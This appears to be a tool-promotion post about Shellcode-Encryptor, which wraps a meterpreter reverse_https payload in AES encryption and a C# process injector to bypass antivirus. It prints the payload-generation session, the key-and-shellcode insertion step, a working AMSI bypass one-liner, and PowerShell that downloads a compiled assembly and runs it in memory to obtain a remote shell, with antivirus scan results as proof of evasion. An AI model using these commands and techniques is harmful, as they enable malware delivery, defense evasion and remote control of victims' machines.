Kali Linux

Shellcode-Encryptor : A Simple Shell Code Encryptor/Decryptor/Executor To Bypass Anti Virus

Shellcode-Encryptor is a simple shell code encryptor/decryptor/executor to bypass anti virus.

Note: I have completely redone the work flow for creating the bypass, I have found injecting the binary into memory using PowerShell as the most effective method.


To generate a .Net binary containing base64 encoded, AES encrypted shellcode that will execute on a Windows target, bypassing anti-virus.


Use the meterpreter_encryptor.py to create the encrypted base64 shellcode:

root@kali:~# ./meterpreter_encryptor.py -p windows/x64/meterpreter/reverse_https -i -l 443 -f b64
[+] Generating MSFVENOM payload…
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor_dynamic
x64/xor_dynamic succeeded with size 667 (iteration=0)
x64/xor_dynamic chosen with final size 667
Payload size: 667 bytes
Saved as: ./msf.bin
[+] Encrypting the payload, key=fjlmjiEgnQ4K6CjNCrPlqug1HW4icMec…
[+] Base64 output:

Take the key and shellcode and insert it into ProcessInjector.cs

// decrypt the base64 payload
string payload = “sZkMii [etc…]”;
string key = “fjlmjiEgnQ4K6CjNCrPlqug1HW4icMec”;

Compile the C# code into an executable (e.g., metInject.exe) and serve it via a web server.

Inject the executable into a remote PowerShell process:

AMSI bypass

$a = [Ref].Assembly.GetTypes();ForEach($b in $a) {if ($b.Name -like “iutils”) {$c = $b}};$d = $c.GetFields(‘NonPublic,Static’);ForEach($e in $d) {if ($e.Name -like “itFailed”) {$f = $e}};$f.SetValue($null,$true)
$bytes = (Invoke-WebRequest “”).Content;
$assembly = [System.Reflection.Assembly]::Load($bytes);
$entryPointMethod = $assembly.GetType(‘ProcessInjection.Program’, [Reflection.BindingFlags] ‘Public, NonPublic’).GetMethod(‘Main’, [Reflection.BindingFlags] ‘Static, Public, NonPublic’);
$entryPointMethod.Invoke($null, (, string[]));

Hopefully you will have a nice meterpreter shell.


./meterpreter_encryptor.py -h
usage: meterpreter_encryptor.py [-h] [-l LPORT] [-i LHOST] [-p PAYLOAD] [-m METHOD] [-k KEY] [-e ENCODER] [-f FORMAT]
optional arguments:
-h, –help show this help message and exit
-l LPORT, –lport LPORT
The local port that msfconsole is listening on.
-i LHOST, –lhost LHOST
The local host that msfconsole is listening on.
-p PAYLOAD, –payload PAYLOAD
The payload to generate in msfvenom.
-m METHOD, –method METHOD
The method to use: thread/delegate.
-k KEY, –key KEY The encryption key (32 chars).
-e ENCODER, –encoder ENCODER
The meterpreter encoder.
-f FORMAT, –format FORMAT
The format to output.

AV Scan Results

The binary was scanned using antiscan.me on 03/10/2021.


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